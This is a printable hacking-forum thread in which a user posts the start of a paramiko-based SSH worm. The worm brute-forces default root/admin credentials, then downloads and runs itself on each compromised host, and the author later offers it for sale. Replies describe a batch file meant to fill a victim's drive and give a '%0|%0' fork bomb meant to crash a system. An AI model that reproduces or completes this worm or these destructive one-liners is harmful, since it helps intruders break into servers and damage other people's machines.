![]() |
|
Advice For a Python Worm - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Python (https://sinister.li/Forum-Python) +--- Thread: Advice For a Python Worm (/Thread-Advice-For-a-Python-Worm) |
Advice For a Python Worm - iii23 - 09-04-2020 I've just started to work on a ssh worm that primarily uses paramiko. The basic goal is to brute a ssh server from a generated up list, login, and download and run the same script on the infected machine so the cycle continues. I'll update the code ad I contiune working on it. Code: import paramiko
import random
import socket
import os
import random
usernames = ['root',
'admin']
passwords = ['root',
'admin', 'password']
print("Welcome to MikoWorm!")
def sshconnect(ip, usernames, passwords):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connectRE: Advice For a Python Worm - Jusluvn - 09-13-2020 How's it coming? I'm interested in this. I have been brushing up on my python recently RE: Advice For a Python Worm - iii23 - 09-14-2020 (09-13-2020, 08:49 PM)B-man Wrote: How's it coming? I'm interested in this. I have been brushing up on my python recentlyI just finished working on my worm and I'm selling it for $10. RE: Advice For a Python Worm - d4ggm4sk - 01-12-2021 Is this a thread where you give advice, or do you want advice? RE: Advice For a Python Worm - DedSpace - 02-10-2021 For any one interested, there is a book called "Black Hat Python" where this and many other things are covered with examples. RE: Advice For a Python Worm - d4ggm4sk - 02-12-2021 Creating a worm is really simple. Many people think that it takes some form of genius to create a virus. You can create a virus that will destroy someone's computer just by typing in these following lines: Quote:"echo off” on the first line. A worm is made to replicate itself inside in this case the programs folder. >> Basically it will clot up the victim's entire C: drive and continue to do so even if he deletes the worm files, since every worm replicates itself. The whole process is in a matter of seconds. RE: Advice For a Python Worm - DedSpace - 02-13-2021 (02-12-2021, 09:28 PM)☣︎︎︎︎℟︎|†︎|NG0 Wrote: Many people think that it takes some form of genius to create a virus. Not to mention the classic: Code: %0|%0This will keep re spawning a process until the system crashes. RE: Advice For a Python Worm - d4ggm4sk - 02-13-2021 (02-13-2021, 12:32 PM)DedSpace Wrote:I see what you did there, hahahahaha(02-12-2021, 09:28 PM)☣︎︎︎︎℟︎|†︎|NG0 Wrote: Many people think that it takes some form of genius to create a virus. |